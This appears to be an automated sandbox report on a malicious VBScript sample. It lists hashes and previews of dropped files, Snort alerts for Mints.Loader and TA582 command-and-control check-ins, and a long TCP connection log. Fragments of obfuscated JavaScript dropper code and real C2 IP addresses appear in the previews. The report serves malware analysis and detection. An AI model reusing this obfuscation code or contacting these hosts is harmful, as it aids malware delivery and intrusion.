                                                                                                                              SHA-512:2D54AB6FE2F71E03B360D2C0E5EF6269DA4EE8191445E9ACECEE4A1C935EAB8FDF1FC2C06A14B36DAA82E7BE0968F8EED1BF7FB30304BA8137C738F080E63691
                                                                                                                              Malicious:false
                                                                                                                              Preview:acosvb.txt.acvixr.txt.adimqh.txt.advkwe.txt.aehois.txt.agnprl.txt.ahtkco.txt.ajmdxh.txt.ajykuv.txt.alzcqd.txt.aolwzh.txt.aowqks.txt.apinhw.txt.apybvd.txt.aucjpi.txt.aviloh.txt.avjbmt.txt.awrgeb.txt.axgkvf.txt.axtfwk.txt.axyohf.txt.ayojtr.txt.bckimf.txt.bedskm.txt.bfmstk.txt.bgkluf.txt.bhrsok.txt.bjenhx.txt.bkuhcj.txt.bmkvfo.txt.bmntfc.txt.bnfpjq.txt.bnsqhl.txt.boctsi.txt.bqagtw.txt.brivej.txt.brmcuo.txt.brvcon.txt.bsuxni.txt.bsyhel.txt.buersl.txt.bvayux.txt.bvtnxg.txt.bwjsde.txt.bwqztc.txt.bynwiz.txt.cdfoxq.txt.cdsrne.txt.cenzsh.txt.cfvedw.txt.cgemlk.txt.chzwis.txt.cihlkf.txt.cjdams.txt.ckjhao.txt.cmhniy.txt.cmkovg.txt.cnowez.txt.codneq.txt.ctyhds.txt.cuzyrn.txt.cvbrkt.txt.cwalbf.txt.cwmist.txt.cwrqlj.txt.cwuspz.txt.cyuwxm.txt.czoahi.txt.dcswua.txt.dfzirc.txt.dimxvb.txt.djcuar.txt.djugez.txt.dkauol.txt.dlerac.txt.dnujfr.txt.dnyaje.txt.dpygbo.txt.dqetif.txt.drawbz.txt.dxvzfu.txt.dyvnzc.txt.dzlgtx.txt.eajylz.txt.eakigy.txt.eaojfc.txt.ebqkmv.txt.efznhl.txt.einfto.txt.ejorqk.txt.ejycbr.txt
                                                                                                                              Process:C:\Windows\System32\wscript.exe
                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (1782)
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):170414
                                                                                                                              Entropy (8bit):4.833432010968271
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:1536:nwhPHH0Q7ISFxMA2klw3FyH0Q7ISFxLA2klw3F1A2klw3F7H0Q7ISFxhH0Q7ISFO:n6/NM4sQNL4sX4sRNlNk
                                                                                                                              MD5:972C326427B4194C6D7A9654037440E0
                                                                                                                              SHA1:E757FD8E3330B5CB4D7F21F1E6228670175F4D9D
                                                                                                                              SHA-256:EB5BB439CF49B68E92CD06EAB1A126CC781D0B421F1995CE280E8A829F09199A
                                                                                                                              SHA-512:C97748CA961258214C7E27297890C1436DD761EACA9FF05A4C299F1202D14BA7E16B134AC8116AEC61B093C911A5429189BC21C3F37A18436B5DB06A88FD62E8
                                                                                                                              Malicious:false
                                                                                                                              Preview:var thehis0wouldsovereignty = thehis0thewith;.function thehis0thewith(nothistory, thewith) {. var wouldsovereignty = thehis0nothistory();. thehis0thewith = function (andrewforces, suchthe) {. andrewforces = andrewforces - (0x517 * 0x1 + 0x16be + 0x1a8a * -0x1);. var ourtypos = wouldsovereignty[andrewforces];. if (thehis0thewith['FzvcMl'] === undefined) {. var courtvii = function (Ourtypos) {. var Andrewforces = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';. var Suchthe = '';. var Wouldsovereignty = '';. for (var Courtvii = 0x1454 + -0x6a1 + -0x1 * 0xdb3, sUchthe, tHewith, wOuldsovereignty = -0x1462 + -0x21e3 * 0x1 + 0x1217 * 0x3; tHewith = Ourtypos['charAt'](wOuldsovereignty++); ~tHewith && (sUchthe = Courtvii % (0x441 * 0x3 + -0x9 * 0x233 + -0x70c * -0x1) ? sUchthe * (0xe58 + -0x1 * -0x1cc3 + -0x3 * 0xe49) + tHewith : tHewith, Courtvii++ % (0x16 * 0x69 + 0x1 * 0x1e1
                                                                                                                              Process:C:\Windows\System32\wscript.exe
                                                                                                                              File Type:ASCII text
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):5511
                                                                                                                              Entropy (8bit):4.266147627591556
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:96:7ysyAYXEdjm3uKRiTtfKbv3ZEptfBi3SwSGm+p9urbaF/Vxi71y0qPxfOUe7VP8A:7ysFYXE1m3KxfIxLV9uHaBVxeXifw98A
                                                                                                                              MD5:0FD04EAFDBE2B9D4D0BA479ED8337804
                                                                                                                              SHA1:8B8AF00F29C7AF0EC92F2843462873D1001F2FD2
                                                                                                                              SHA-256:309200C4579E7D7945DB1AAA08C65C802A7DE84C0B43B8117DB75D4AAA622930
                                                                                                                              SHA-512:2D54AB6FE2F71E03B360D2C0E5EF6269DA4EE8191445E9ACECEE4A1C935EAB8FDF1FC2C06A14B36DAA82E7BE0968F8EED1BF7FB30304BA8137C738F080E63691
                                                                                                                              Malicious:false
                                                                                                                              Preview:acosvb.txt.acvixr.txt.adimqh.txt.advkwe.txt.aehois.txt.agnprl.txt.ahtkco.txt.ajmdxh.txt.ajykuv.txt.alzcqd.txt.aolwzh.txt.aowqks.txt.apinhw.txt.apybvd.txt.aucjpi.txt.aviloh.txt.avjbmt.txt.awrgeb.txt.axgkvf.txt.axtfwk.txt.axyohf.txt.ayojtr.txt.bckimf.txt.bedskm.txt.bfmstk.txt.bgkluf.txt.bhrsok.txt.bjenhx.txt.bkuhcj.txt.bmkvfo.txt.bmntfc.txt.bnfpjq.txt.bnsqhl.txt.boctsi.txt.bqagtw.txt.brivej.txt.brmcuo.txt.brvcon.txt.bsuxni.txt.bsyhel.txt.buersl.txt.bvayux.txt.bvtnxg.txt.bwjsde.txt.bwqztc.txt.bynwiz.txt.cdfoxq.txt.cdsrne.txt.cenzsh.txt.cfvedw.txt.cgemlk.txt.chzwis.txt.cihlkf.txt.cjdams.txt.ckjhao.txt.cmhniy.txt.cmkovg.txt.cnowez.txt.codneq.txt.ctyhds.txt.cuzyrn.txt.cvbrkt.txt.cwalbf.txt.cwmist.txt.cwrqlj.txt.cwuspz.txt.cyuwxm.txt.czoahi.txt.dcswua.txt.dfzirc.txt.dimxvb.txt.djcuar.txt.djugez.txt.dkauol.txt.dlerac.txt.dnujfr.txt.dnyaje.txt.dpygbo.txt.dqetif.txt.drawbz.txt.dxvzfu.txt.dyvnzc.txt.dzlgtx.txt.eajylz.txt.eakigy.txt.eaojfc.txt.ebqkmv.txt.efznhl.txt.einfto.txt.ejorqk.txt.ejycbr.txt
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):64
                                                                                                                              Entropy (8bit):1.1940658735648508
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Nlllulbnolz:NllUc
                                                                                                                              MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                                                                                                              SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                                                                                                              SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                                                                                                              SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                                                                                                              Malicious:false
                                                                                                                              Preview:@...e................................................@..........
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):60
                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                              Malicious:false
                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                              Process:C:\Windows\System32\wscript.exe
                                                                                                                              File Type:ISO-8859 text, with very long lines (1690)
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):217286
                                                                                                                              Entropy (8bit):4.779915409780977
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3072:n5S7T815+tMK7T815AtMdtMW7T815m7T815N:W65rM65pMg65Q65N
                                                                                                                              MD5:32501F1A629003AAEA783C424BF58162
                                                                                                                              SHA1:37F4411551E69DECFE29F2AE03F7A20BACD561D4
                                                                                                                              SHA-256:59330861A9F72027763FDE810B9DCE92F600BDF51B5F62B7A67A016BA589C6E8
                                                                                                                              SHA-512:3A4698B0C36159203F67FBAA0383036674D6FBFB70C5863D86726B09E39DBAF0DF408EFC4C867185F072517C6B12B61DBC2BD5249925CE1C830A40BE2C789862
                                                                                                                              Malicious:true
                                                                                                                              Preview:var thehis0wouldsovereignty = thehis0thewith;.function thehis0thewith(nothistory, thewith) {. var wouldsovereignty = thehis0nothistory();. thehis0thewith = function (andrewforces, suchthe) {. andrewforces = andrewforces - (0x517 * 0x1 + 0x16be + 0x1a8a * -0x1);. var ourtypos = wouldsovereignty[andrewforces];. if (thehis0thewith['FzvcMl'] === undefined) {. var courtvii = function (Ourtypos) {. var Andrewforces = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';. var Suchthe = '';. var Wouldsovereignty = '';. for (var Courtvii = 0x1454 + -0x6a1 + -0x1 * 0xdb3, sUchthe, tHewith, wOuldsovereignty = -0x1462 + -0x21e3 * 0x1 + 0x1217 * 0x3; tHewith = Ourtypos['charAt'](wOuldsovereignty++); ~tHewith && (sUchthe = Courtvii % (0x441 * 0x3 + -0x9 * 0x233 + -0x70c * -0x1) ? sUchthe * (0xe58 + -0x1 * -0x1cc3 + -0x3 * 0xe49) + tHewith : tHewith, Courtvii++ % (0x16 * 0x69 + 0x1 * 0x1e1
                                                                                                                              Process:C:\Windows\System32\wscript.exe
                                                                                                                              File Type:ISO-8859 text, with very long lines (1782)
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):170382
                                                                                                                              Entropy (8bit):4.831743980654334
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:1536:nwhPeHJP7ITFxDA2klwyFoHJP7ITFx2A2klwyFIA2klwyFJHJP7ITFxpHJP7ITFz:n62QD4DiQ24Da4D7QdQJ
                                                                                                                              MD5:6C8668F63ABA9793A638CED8F3D097D8
                                                                                                                              SHA1:1BD2100FB3AA9550D4C8C445D028B2FE0BF4D920
                                                                                                                              SHA-256:6ADC893696B794C0312560092F0A07FEAB1D889567BC466F0744FF30BF1378E0
                                                                                                                              SHA-512:42D0A5321EA8CC516E3F6CCF8E1D1C60EDA2A5301D5829DB01282F329C72F00F8E57B789464D5930F11B4190CC723F0AB4E7EA21FC930F7817F35AEC7FAB01EF
                                                                                                                              Malicious:true
                                                                                                                              Preview:var thehis0wouldsovereignty = thehis0thewith;.function thehis0thewith(nothistory, thewith) {. var wouldsovereignty = thehis0nothistory();. thehis0thewith = function (andrewforces, suchthe) {. andrewforces = andrewforces - (0x517 * 0x1 + 0x16be + 0x1a8a * -0x1);. var ourtypos = wouldsovereignty[andrewforces];. if (thehis0thewith['FzvcMl'] === undefined) {. var courtvii = function (Ourtypos) {. var Andrewforces = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';. var Suchthe = '';. var Wouldsovereignty = '';. for (var Courtvii = 0x1454 + -0x6a1 + -0x1 * 0xdb3, sUchthe, tHewith, wOuldsovereignty = -0x1462 + -0x21e3 * 0x1 + 0x1217 * 0x3; tHewith = Ourtypos['charAt'](wOuldsovereignty++); ~tHewith && (sUchthe = Courtvii % (0x441 * 0x3 + -0x9 * 0x233 + -0x70c * -0x1) ? sUchthe * (0xe58 + -0x1 * -0x1cc3 + -0x3 * 0xe49) + tHewith : tHewith, Courtvii++ % (0x16 * 0x69 + 0x1 * 0x1e1
                                                                                                                              Process:C:\Windows\System32\curl.exe
                                                                                                                              File Type:ASCII text, with CR, LF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):557
                                                                                                                              Entropy (8bit):2.976369240847854
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:I2swj2SAykymUeg/8Uni1qSgOgcdSgOgcdivIdaq+xIZ3:Vz6ykymUexb1U9cL9cddh+xG3
                                                                                                                              MD5:3AAE9DB95E9B0EE74F4D32680B777CDB
                                                                                                                              SHA1:590EBD81E873AF02B8F5EF00B16A3E55A7B61D39
                                                                                                                              SHA-256:E4AE696DCB8146B1CBE574D6BB7C38C69C885B7C4FEBD366791B8796718D0F76
                                                                                                                              SHA-512:B8E7D55C7436DD97B0ABFF4C995379EAFFD631354F41C0B806EDE1D3E290B1970428A30DDD99747AC8EB14CBE90A05C42C6CCF762A61887F05EC8EDA27C2B487
                                                                                                                              Malicious:false
                                                                                                                              Preview: % Total % Received % Xferd Average Speed Time Time Time Current.. Dload Upload Total Spent Left Speed... 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0. 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0. 0 0 0 0 0 0 0 0 --:--:-- 0:00:01 --:--:-- 0.100 1928 100 1928 0 0 801 0 0:00:02 0:00:02 --:--:-- 801.100 1928 100 1928 0 0 798 0 0:00:02 0:00:02 --:--:-- 799..
                                                                                                                              File type:ASCII text
                                                                                                                              Entropy (8bit):5.422741863094776
                                                                                                                              TrID:
                                                                                                                              • Visual Basic Script (13500/0) 100.00%
                                                                                                                              File name:67618a47ee8c5.vbs
                                                                                                                              File size:709 bytes
                                                                                                                              MD5:0518287873d4fb8925ae78fdcca2fcf4
                                                                                                                              SHA1:e9c1ef40ffb8b5cdbc2320ea1f8a5ea53fb5ebcc
                                                                                                                              SHA256:c7631ac3239d922066eb0d0a1da8f68c440c4af3d189558c890408a03f0e1a69
                                                                                                                              SHA512:7fed1dc12d32d9aea09bf6f643f6775fb5835805d53c91ffbf75da28c880834b615baefbf27317f9212374d1dace21d915cd5328939256bfedb0184e99d8d22a
                                                                                                                              SSDEEP:12:ab1ydJWCH4AddYN1dP17rZfHFXZ3ss7v8ZfzjqH6:ab1ydzH4witRrFH6FT
                                                                                                                              TLSH:E7017B52E6084B56D519528000255429E21DB9BA1CB5CA48E22FFD7F21684F52ED927F
                                                                                                                              File Content Preview:..function pVvId92(vHkR3pm51) . pVvId92 = Replace(vHkR3pm51,"|", "").end function..Dim shell, publicFolder.Set shell = CreateObject("WScript.Shell").publicFolder = shell.ExpandEnvironmentStrings("%PUBLIC%")...Dim vbsFilePath.vbsFilePath = publicFolder
                                                                                                                              Icon Hash:68d69b8f86ab9a86
                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                              2024-12-17T16:32:15.764124+01002057063ET MALWARE Mints.Loader CnC Activity (GET)1192.168.2.649733193.149.129.6180TCP
                                                                                                                              2024-12-17T16:32:15.764124+01002057743ET MALWARE TA582 CnC Checkin1192.168.2.649733193.149.129.6180TCP
                                                                                                                              2024-12-17T16:32:15.873503+01002057063ET MALWARE Mints.Loader CnC Activity (GET)1192.168.2.649732193.149.129.6180TCP
                                                                                                                              2024-12-17T16:32:15.873503+01002057743ET MALWARE TA582 CnC Checkin1192.168.2.649732193.149.129.6180TCP
                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                              Dec 17, 2024 16:32:00.562515974 CET49709443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:00.562566996 CET4434970945.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:00.562628031 CET49709443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:00.587830067 CET49709443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:00.587863922 CET4434970945.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:02.004332066 CET4434970945.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:02.004409075 CET49709443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:02.008205891 CET49709443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:02.008222103 CET4434970945.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:02.008552074 CET4434970945.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:02.012118101 CET49709443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:02.055325985 CET4434970945.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:02.505084038 CET4434970945.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:02.505116940 CET4434970945.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:02.505161047 CET49709443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:02.505176067 CET4434970945.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:02.505192041 CET4434970945.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:02.505225897 CET49709443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:02.536662102 CET49709443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:02.536675930 CET4434970945.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:05.043020964 CET49711443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:05.043098927 CET4434971145.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:05.043369055 CET49711443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:05.044728041 CET49712443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:05.044826031 CET4434971245.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:05.044903994 CET49712443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:05.056171894 CET49711443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:05.056214094 CET4434971145.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:05.057209015 CET49712443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:05.057250023 CET4434971245.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:06.476413965 CET4434971245.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:06.476526976 CET49712443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:06.525676966 CET49712443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:06.525732994 CET4434971245.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:06.526668072 CET4434971245.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:06.527928114 CET49712443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:06.529457092 CET49712443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:06.571368933 CET4434971245.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:06.709386110 CET4434971145.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:06.709492922 CET49711443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:06.757762909 CET49711443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:06.757802010 CET4434971145.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:06.758776903 CET4434971145.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:06.758841038 CET49711443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:06.760824919 CET49711443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:06.803328991 CET4434971145.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:06.984641075 CET4434971245.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:06.984715939 CET4434971245.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:06.984743118 CET49712443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:06.984813929 CET4434971245.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:06.984849930 CET49712443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:06.984873056 CET49712443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:06.985332966 CET4434971245.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:06.985385895 CET49712443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:06.985452890 CET4434971245.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:06.985503912 CET49712443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:06.987163067 CET49712443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:06.987195015 CET4434971245.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:07.000488997 CET49714443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:07.000565052 CET4434971445.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:07.000654936 CET49714443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:07.000897884 CET49714443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:07.000933886 CET4434971445.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:07.225122929 CET4434971145.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:07.225193977 CET4434971145.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:07.225255966 CET49711443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:07.225294113 CET4434971145.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:07.225311041 CET49711443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:07.225339890 CET49711443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:07.225375891 CET4434971145.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:07.225425959 CET49711443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:07.226494074 CET49711443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:07.226526976 CET4434971145.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:07.246661901 CET49715443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:07.246710062 CET4434971545.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:07.246809006 CET49715443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:07.271218061 CET49715443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:07.271241903 CET4434971545.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:08.371697903 CET4434971445.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:08.371814013 CET49714443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:08.372503996 CET49714443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:08.372519016 CET4434971445.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:08.372692108 CET49714443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:08.372704029 CET4434971445.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:08.638117075 CET4434971545.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:08.638243914 CET49715443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:08.638631105 CET49715443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:08.638637066 CET4434971545.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:08.638964891 CET49715443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:08.638968945 CET4434971545.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:08.883600950 CET4434971445.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:08.883666992 CET4434971445.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:08.883677006 CET49714443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:08.883737087 CET4434971445.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:08.883770943 CET49714443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:08.883819103 CET49714443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:09.001640081 CET4434971445.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:09.001751900 CET49714443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:09.090008974 CET4434971445.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:09.090142965 CET49714443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:09.108351946 CET4434971445.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:09.108510971 CET49714443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:09.136127949 CET4434971445.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:09.136245012 CET49714443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:09.164964914 CET4434971545.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:09.165038109 CET4434971545.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:09.165199041 CET49715443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:09.165230989 CET4434971545.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:09.165299892 CET49715443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:09.189438105 CET4434971445.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:09.189543962 CET49714443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:09.267764091 CET4434971545.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:09.267906904 CET49715443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:09.273437023 CET4434971445.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:09.273592949 CET49714443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:09.286801100 CET4434971445.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:09.286901951 CET49714443192.168.2.645.11.180.77
